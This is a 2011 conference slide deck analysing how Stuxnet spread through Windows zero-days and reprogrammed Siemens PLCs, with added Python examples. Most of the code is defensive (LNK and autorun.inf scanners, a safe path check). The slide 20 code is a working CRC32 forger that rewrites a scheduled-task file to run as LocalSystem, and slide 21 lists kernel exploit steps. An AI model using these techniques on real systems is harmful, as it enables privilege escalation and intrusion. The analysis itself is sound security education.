Tomer Teller , DC9723, 18/1/11


  1. Tomer Teller , DC9723, 18/1/11 Stuxnet: How to take over a (nuclear) power plant

  2. Who Am I? • A black hat gone good (courier -> cracker) • Security Evangelist at Check Point • Specialize in network hacking & reversing • Finished all levels of Angry Birds (3 stars!)

  3. Why are we here? • We like malware • Stuxnet is malware! • Iran is involved • Microsoft got pwn'd • Learn new techniques • See some demos (hopefully)

  4. Terminology • SCADA - Supervisory Control and Data Acquisition: the class of Industrial Control Systems (ICS) that monitor and control industrial, infrastructure or facility processes. • PLC - Programmable Logic Controller: the embedded controller that drives machinery, e.g. on a factory assembly line. • Field PG - the Siemens engineering laptop used to program PLCs. • Step7/WinCC - Siemens software installed on the Field PG: Step7 is the IDE/compiler used to program the PLC, WinCC the HMI/visualisation layer.

  5. Threat Overview • Architecture • A single DLL • Resources inside that DLL hold the payload components • Component based • Exploits • Four undisclosed (zero-day) vulnerabilities at the time of discovery! • Techniques • A "cunning" hack • The LoadLibrary() manoeuvre

  6. Statistics (chart; ref: Symantec dossier paper) This is not normal…

  7. Welcome to the Battle Field

  8. What’s going to happen? Here

  9. What’s going to happen? Nuclear Reactor Gas pipeline Water Pipe

  10. Mission Objectives: Introduce threat to target → Propagate inside the network → Infect Field PG machines → GOAL: Reprogram ICS machines

  11. The First Infection • An insider • A contractor • A SCADA conference USB give-away • Super Sheep over the fence

  12. Removable Drive Propagation Okay, now what? • LNK auto-execution (MS10-046) • Autorun.inf technique

  13. LNK Auto-Execution (MS10-046, CVE-2010-2568) • Design-level flaw in how the Windows shell parses LNK (shortcut) files • The file format can store a link to a Control Panel applet (CPL), which is a DLL • The vulnerable code handles such a link the way it handles an icon: it loads the DLL to render the shortcut • Problem: the shell does not check that the DLL lives in SYSTEM32 or is a registered (white-listed) applet • Result: merely displaying the shortcut, e.g. opening the USB drive in Explorer, loads an arbitrary DLL; no click is required

  14. LNK Binary Format (DIY)

  LNK header:
    Offset  Size  Field
    0x0000  4     HeaderSize
    0x0004  16    LinkCLSID
    0x0014  4     LinkFlags
    ...           (optional structures)
    0x0042  4     (reserved)

  Control item:
    Offset  Size  Field
    0x0000  2     itemIDSize
    0x0002  2     wDummy
    ...
    0x0018  n     Path
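The following parser, added here as an example (it is not code from the talk), walks the two structures in the table above on a shortcut built inline from the same layout, and applies the check slide 13 says Windows omitted: does any control item point at a DLL outside SYSTEM32? The control-item field names and offsets are the slide's; that the path is UTF-16LE and NUL-terminated, and the constructed sample shortcut itself, are assumptions of the example.

```python
import struct
import uuid

# ShellLinkHeader constants (MS-SHLLINK): fixed 0x4C-byte header, fixed CLSID,
# and the LinkFlags bit that says a LinkTargetIDList follows the header.
HEADER_SIZE = 0x4C
SHELL_LINK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046")
HAS_LINK_TARGET_ID_LIST = 0x00000001
# Offset of the path inside a control item, taken from the slide's table.
ITEM_PATH_OFFSET = 0x18


def parse_header(data):
    """Validate the fixed header and return (HeaderSize, LinkFlags)."""
    (header_size,) = struct.unpack_from("<I", data, 0x00)
    if header_size != HEADER_SIZE:
        raise ValueError("HeaderSize must be 0x4C")
    if uuid.UUID(bytes_le=bytes(data[0x04:0x14])) != SHELL_LINK_CLSID:
        raise ValueError("LinkCLSID is not the shell link CLSID")
    (link_flags,) = struct.unpack_from("<I", data, 0x14)
    return header_size, link_flags


def parse_id_list(data, offset):
    """Walk the LinkTargetIDList: a 2-byte IDListSize, then ItemIDs
    (2-byte itemIDSize followed by data) up to a 0x0000 terminator."""
    (id_list_size,) = struct.unpack_from("<H", data, offset)
    pos, end = offset + 2, offset + 2 + id_list_size
    items = []
    while pos + 2 <= end:
        (item_size,) = struct.unpack_from("<H", data, pos)
        if item_size == 0:            # TerminalID
            break
        if item_size < 2 or pos + item_size > end:
            raise ValueError("ItemID size runs past the IDList")
        items.append(bytes(data[pos:pos + item_size]))
        pos += item_size
    return items


def item_path(item):
    """Path field of a control item: assumed UTF-16LE, NUL-terminated."""
    raw = item[ITEM_PATH_OFFSET:]
    return raw.decode("utf-16-le", errors="replace").split("\x00", 1)[0]


def suspicious_dll_targets(lnk):
    """The check the slide says Windows did not make: return every item path
    that names a DLL outside System32, i.e. a shortcut that would make the
    shell load an arbitrary DLL just to render an icon."""
    header_size, flags = parse_header(lnk)
    if not flags & HAS_LINK_TARGET_ID_LIST:
        return []
    hits = []
    for item in parse_id_list(lnk, header_size):
        if len(item) <= ITEM_PATH_OFFSET:
            continue
        path = item_path(item)
        low = path.lower()
        if low.endswith(".dll") and not low.startswith("c:\\windows\\system32\\"):
            hits.append(path)
    return hits


def build_control_item(path):
    """Constructed control item following the slide's layout (itemIDSize@0,
    wDummy@2, elided fields, path@0x18)."""
    body = bytearray(ITEM_PATH_OFFSET) + path.encode("utf-16-le") + b"\x00\x00"
    struct.pack_into("<H", body, 0, len(body))   # itemIDSize
    struct.pack_into("<H", body, 2, 0)           # wDummy
    return bytes(body)


def build_sample_lnk(path):
    """Constructed minimal .lnk: header + one control item. Not a real Stuxnet sample."""
    header = bytearray(HEADER_SIZE)
    struct.pack_into("<I", header, 0x00, HEADER_SIZE)
    header[0x04:0x14] = SHELL_LINK_CLSID.bytes_le
    struct.pack_into("<I", header, 0x14, HAS_LINK_TARGET_ID_LIST)
    id_list = build_control_item(path) + b"\x00\x00"
    return bytes(header) + struct.pack("<H", len(id_list)) + id_list


if __name__ == "__main__":
    print(suspicious_dll_targets(build_sample_lnk(r"C:\Users\Public\evil.dll")))
```

The same walk over a real shortcut would use the full ItemID layouts from MS-SHLLINK; the point here is that the decision to load a DLL is made from attacker-controlled bytes in a file the shell parses on sight, so any defensive check has to happen before the loader is invoked, not after.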

  15. Autorun.inf Technique • We all know the AutoRun.inf file and the AutoPlay dialog it drives • The code that parses that file is very "flexible": lines it cannot make sense of are simply ignored • How flexible?

  16. Autorun.inf Technique cont. (diagram: EXE + AutoRun) • The autorun.inf Stuxnet drops is a valid executable with an [autorun] section appended: the parser skips the PE bytes and honours the section, so one file is both the INF and the payload it launches
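An added example (not the talk's code) of how lenient parsing lets an executable double as autorun.inf, together with a scanner for the pattern. The parser is an assumed model of the documented behaviour (ignore any line that is neither a [section] nor key=value), not the Windows implementation, and the sample file is constructed.

```python
import re

SECTION_RE = re.compile(rb"^\s*\[(?P<name>[^\]\r\n]*)\]\s*$")
KEY_RE = re.compile(rb"^\s*(?P<key>[A-Za-z0-9_\\]+)\s*=\s*(?P<val>[^\r\n]*?)\s*$")


def parse_autorun(blob):
    """Lenient parse in the spirit of the slide: scan line by line, keep the
    keys of the [autorun] section, and silently skip anything that is not
    '[section]' or 'key=value' (binary junk included). Assumed model of the
    Windows parser, not its code."""
    keys, in_autorun = {}, False
    for line in blob.split(b"\n"):
        m = SECTION_RE.match(line)
        if m:
            in_autorun = m.group("name").strip().lower() == b"autorun"
            continue
        if not in_autorun:
            continue
        m = KEY_RE.match(line)
        if m:
            keys[m.group("key").lower().decode("latin-1")] = m.group("val").decode("latin-1")
    return keys


def assess_autorun(blob):
    """Return the reasons this autorun.inf looks like the executable-plus-INF trick."""
    findings = []
    if blob[:2] == b"MZ":
        findings.append("file starts with an MZ header: autorun.inf is itself a PE executable")
    keys = parse_autorun(blob)
    for k in ("open", "shellexecute"):
        target = keys.get(k, "").lower()
        if target.endswith("autorun.inf"):
            findings.append(f"{k}= launches the .inf file itself")
        elif target and not target.endswith((".exe", ".bat", ".cmd")):
            findings.append(f"{k}= points at a non-executable extension: {target}")
    if keys.get("action", "").lower().startswith("open folder"):
        findings.append("action= mimics the built-in 'Open folder to view files' entry")
    return findings


# Constructed sample: a fake MZ stub, 256 bytes of binary junk, then an INF tail
# that runs the same file and relabels the AutoPlay entry to look like a folder open.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    + bytes(range(0, 256))
    + b"\r\n[autorun]\r\n"
    + b"open=autorun.inf\r\n"
    + b"action=Open folder to view files\r\n"
    + b"icon=%SystemRoot%\\system32\\shell32.dll,4\r\n"
)

if __name__ == "__main__":
    for finding in assess_autorun(SAMPLE):
        print(finding)
```

The junk bytes include newlines, brackets and equals signs, and the parser still recovers the three keys; that tolerance is exactly what lets a PE image sit in front of the [autorun] section. A scanner that checks the first two bytes of any autorun.inf, plus what open= and shellexecute= actually point at, catches the trick without needing a signature for the payload.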

  17. The LoadLibrary() Technique • Whenever Stuxnet needs to load a DLL (including itself), it uses a special method to bypass anti-virus behaviour blocking • It calls LoadLibrary() with a specially crafted file name that does not exist on disk, which would normally make the call fail • ntdll.dll has been hooked (the Zw* file and section routines LoadLibrary goes through) to watch for requests for these crafted names • Such names are mapped to a location chosen by Stuxnet, so the module is served from memory and no file ever touches the disk • File name example: KERNEL32.DLL.ASLR.[ADDRESS]

  18. User/Kernel Space Rootkits • User space rootkit • Hides files by hooking kernel32 and ntdll • FindFirstFileW, FindNextFileW • NtQueryDirectoryFile, ZwQueryDirectoryFile • Kernel space rootkit • Registers a file-system filter driver (MrxNet.sys) to intercept I/O Request Packets (IRPs) • Monitors directory control and query requests, i.e. the directory listings every reader of the drive sees • Detects removable devices so the dropped files can be hidden on them and new drives infected

  19. Compromised Certificates • The driver was digitally signed with legitimate code-signing certificates (stolen from Realtek, and later JMicron), so Windows trusted it and driver-signature enforcement did not stop it • Both companies have offices in the Hsinchu Science and Industrial Park (Taiwan)

  20. No Admin?! No Problem! (Vista+ Style) • Privilege escalation in the Task Scheduler (MS10-092; PoC published 20-11-2010, www.exploit-db.com/exploits/15589) • The task's XML file is integrity-checked only with a CRC32 • Modify the original task so it runs as LocalSystem • Fix the CRC32 by appending padding bytes <- a collision, trivial because CRC is linear and unkeyed, not a MAC
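A worked version of the collision step, added here as an example rather than taken from the PoC or the talk: it rewrites the principal of a constructed task file to LocalSystem (S-1-5-18), then appends an XML comment containing four forged bytes so that the CRC32 of the modified file equals the CRC32 of the original. The task XML is cut down and stored as UTF-8 (real task files are UTF-16, which changes nothing in the byte-oriented CRC math); where the padding goes is this example's choice.

```python
import re
import zlib
import xml.etree.ElementTree as ET


def _make_table():
    """Reflected CRC-32 table (polynomial 0xEDB88320), the one zlib.crc32 uses."""
    table = []
    for i in range(256):
        c = i
        for _ in range(8):
            c = (c >> 1) ^ 0xEDB88320 if c & 1 else c >> 1
        table.append(c)
    return table


TABLE = _make_table()
# Every entry has a distinct top byte, so the top byte of a CRC state tells us
# which entry was XORed in last. That makes each byte step invertible.
REV = {entry >> 24: i for i, entry in enumerate(TABLE)}


def _step(state, byte):
    return TABLE[(state ^ byte) & 0xFF] ^ (state >> 8)


def crc32(data):
    return zlib.crc32(data) & 0xFFFFFFFF


def state_before(suffix, end_state):
    """Undo the CRC update for `suffix`: the state that, after suffix, yields end_state."""
    state = end_state
    for b in reversed(suffix):
        i = REV[state >> 24]
        state = (((state ^ TABLE[i]) << 8) | (i ^ b)) & 0xFFFFFFFF
    return state


def forge_suffix(prefix, want_state):
    """Four bytes X such that the CRC state after prefix+X equals want_state."""
    idx, state = [], want_state
    for _ in range(4):                      # backwards: which table entry each step used
        i = REV[state >> 24]
        idx.append(i)
        state = ((state ^ TABLE[i]) << 8) & 0xFFFFFFFF
    state = crc32(prefix) ^ 0xFFFFFFFF      # zlib reports state ^ 0xFFFFFFFF
    out = bytearray()
    for i in reversed(idx):                 # forwards: pick the byte that selects that entry
        out.append((state ^ i) & 0xFF)
        state = _step(state, out[-1])
    return bytes(out)


PRINTABLE = set(range(0x20, 0x7F)) - {ord("-")}   # no "--" inside an XML comment


def pad_to_crc(doc, target_crc):
    """Append an XML comment whose four forged bytes make crc32(result) == target_crc.
    The comment prefix is varied until the forged bytes happen to be printable."""
    want_end, tail, n = target_crc ^ 0xFFFFFFFF, b" -->\n", 0
    while True:
        head = doc + b"<!-- pad %d: " % n
        x = forge_suffix(head, state_before(tail, want_end))
        if all(b in PRINTABLE for b in x):
            return head + x + tail
        n += 1


# Constructed, cut-down task file. Real task XML is UTF-16; the CRC math is
# byte-oriented, so UTF-8 is used here purely for readability.
ORIGINAL_TASK = b"""<?xml version="1.0"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><UserId>S-1-5-21-1111-2222-3333-1001</UserId></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\Users\\bob\\payload.exe</Command></Exec></Actions>
</Task>
"""


def escalate_task(original, new_user=b"S-1-5-18"):
    """Rewrite the principal to LocalSystem (S-1-5-18) and restore the original CRC32."""
    modified = re.sub(rb"<UserId>[^<]*</UserId>",
                      b"<UserId>" + new_user + b"</UserId>", original, count=1)
    return pad_to_crc(modified, crc32(original))


def verify_collision(original, forged):
    """True if the forged file still parses as XML and carries the original's CRC32."""
    ET.fromstring(forged)
    return crc32(forged) == crc32(original) and forged != original


if __name__ == "__main__":
    forged = escalate_task(ORIGINAL_TASK)
    print(forged.decode(), hex(crc32(ORIGINAL_TASK)), hex(crc32(forged)))
```

No brute force is involved: because each table entry has a unique top byte, every byte step of CRC-32 can be inverted, and four free bytes are enough to steer the register to any value. The retry loop exists only to keep the padding printable and free of "--" so the XML stays well-formed. The lesson is the one the slide makes: a CRC detects accidental corruption, it does not authenticate; anything that protects a privileged file needs a keyed MAC or a signature.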

  21. No Admin?! No Problem! (XP Style) • Privilege escalation in keyboard layout loading (MS10-073) • A keyboard layout file can be loaded from anywhere on the system • Out-of-bounds index into an array of function pointers in win32k.sys • Steps: copy the payload to a user-space address, craft a layout whose function-type index is 5 (past the three real entries), load the keyboard layout • Kernel debugger view of the table:
    cf12fa38  cf933423  win32k!KbdNlsFuncTypeDummy   [index 0]
    cf12fa3c  cf93342e  win32k!KbdNlsFuncTypeNormal  [index 1]
    cf12fa40  cf933474  win32k!KbdNlsFuncTypeAlt     [index 2]
    cf12fa44  ff496867                               [index 3]
    cf12fa48  ff466564                               [index 4]
    cf12fa4c  60636261  <- user space address        [index 5]
    cf12fa50  0000006e

  22. Demo(s) Time • Autorun.inf • LNK vulnerability (MS10-046) • User Space RootKit (source available)

  23. Mission #1 Completed Here

  24. Recap: Introduce threat to target → Propagate inside the network → Infect Field PG machines → GOAL: Reprogram ICS machines

  25. MS08-067 – Server Service Vulnerability • SRVSVC is an RPC interface which controls shares and files • Binding to this interface over SMB and calling one of its functions, NetprPathCanonicalize(), with a malformed path string, e.g. /<name>/../../<rest of string>, results in a stack buffer overflow • Successful exploitation gives code execution with SYSTEM privileges • Each ".." makes the canonicaliser search backwards for the previous '\'; with more ".." than components the search runs off the start of the buffer:
    \share\path1\path2/../../../../buff   (search for '\')
    \share\path1/../../../buff            (search for '\')
    \share/../../buff                     (search for '\')
    /../buff                              (search for '\') -> Buffer Overflow
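A simplified model of the ".." handling the diagram walks through, added here as an example (it is not the Windows routine and does not reproduce its stack layout): the output loses one component per "..", and once no separator is left the backward seek would continue past the buffer; the safe variant rejects the path instead.

```python
import re


def canonicalize_model(path, safe):
    """Model of the '..' collapsing in the server-service path canonicaliser.

    Assumed behaviour for illustration only, not the Windows code: each
    component is appended to `out`; each '..' seeks back to the previous
    backslash and truncates there. With safe=False a seek that finds no
    separator is counted as an underflow and ignored, which is the point
    where the real routine keeps scanning backwards into whatever lies
    before the buffer on the stack. With safe=True the path is rejected.
    Returns (canonical_path, underflow_count).
    """
    out, underflow = bytearray(), 0
    for segment in re.split(rb"[\\/]", path):
        if segment == b"..":
            cut = out.rfind(b"\\")
            if cut < 0:
                if safe:
                    raise ValueError("'..' climbs above the share root")
                underflow += 1
                continue
            del out[cut:]
        elif segment and segment != b".":
            out += b"\\" + segment
    return bytes(out), underflow


def is_safe_path(path):
    """True if the path never tries to climb above the share root."""
    try:
        canonicalize_model(path, safe=True)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(canonicalize_model(rb"\share\path1\path2/../../../../buff", safe=False))
```

Counting depth before honouring a ".." is the whole fix; the patched Windows code does the equivalent bounds check against the start of the buffer, and any path canonicaliser you write should do the same before it touches memory.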

  26. MS10-061 – Print Spooler Vulnerability • Published in 2009 in a hacker magazine • Allows a file to be written into the %System% folder by "printing" a document to a file through a shared printer • Stuxnet "prints" two files • A Managed Object Format (MOF) file, which WMI compiles and uses to register an event consumer • The Stuxnet worm itself • Once WMI finds the MOF file in its auto-compile directory (C:\Windows\System32\wbem\mof\<file>) it compiles it • The registered event then runs the dropped executable

  27. Network Shares Infection • Stuxnet enumerates all user accounts of the computer and of the domain • Tries every available network resource using those user credentials • Drops the Stuxnet executable on the remote share • Schedules a job on the remote host via NetScheduleJobAdd() to run it two minutes later

  28. P2P Communication Component • Stuxnet installs an RPC client/server • Compromised computers connect to each other and ask for the latest version, so an update reaches machines with no Internet access
    RPC server routines:
      0: Return current version
      1: Inject & execute
      2: Load module
      3: Inject into lsass.exe
      4: Send current version (the update itself)
      5: Create process
      6: Read file
    Exchange: infected client → Get Version (0) → infected server sends its version → client → Request Update (4) → server sends the update
    ref: Symantec dossier paper

  29. Command & Control Component • Stuxnet phones home over an HTTP backdoor, sending encrypted data
    Infected machine → GET www.msn.com (connectivity check) → 200 OK
    Infected machine → GET index.php?data=[encrypted] → Command X, Command Y
    ref: Symantec dossier paper

  30. Mission #2 Completed (diagram: Ping / Alive / Here)

  31. Recap: Introduce threat to target → Propagate inside the network → Infect Field PG machines → GOAL: Reprogram ICS machines

  32. PLC Rootkit • On the Field PG, Stuxnet looks for: • A specific version of STEP7/WinCC • A specific network card • A specific PLC model and version connected • Stuxnet replaces the DLL in charge of communicating with the PLC on the Field PG (the Step7 library s7otbxdx.dll) with its own wrapper around the original • After the replacement Stuxnet can: • Monitor PLC commands being written to and read from the PLC • Infect the PLC by inserting malicious code blocks • Mask the fact that the PLC is infected by returning the original blocks on read

  33. Infected PLC Example (READ/WRITE)
    Write path: Step7/WinCC on the Field PG → Write(5) → New DLL rewrites the data to 500 → Original DLL → Write(500) → PLC now holds 500 ("Wrote Data")
    Read path: PLC (500) → Original DLL → Read() returns 500 → New DLL swaps in the value the operator expects (5) → Step7/WinCC displays 5
    The operator sees 5 in both directions while the PLC is actually running with 500.

  34. Recap: Introduce threat to target → Propagate inside the network → Infect Field PG machines → GOAL: Reprogram ICS machines

  35. Mission Accomplished

  36. Who's Behind It? • Some say Israel: • PDB path b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb • myrtus -> myrtle -> Hadassah -> Queen Esther • or My-RTUs -> Remote Terminal Units -> the devices that SCADA systems control • 0x19790509 • May 09, 1979: the date of Iran's execution of Habib Elghanian, a prominent Jewish businessman in Iran • Some say Germany • Some say USA

  37. Questions ?

  38. kthxbye Tomer Teller tomert@checkpoint.com
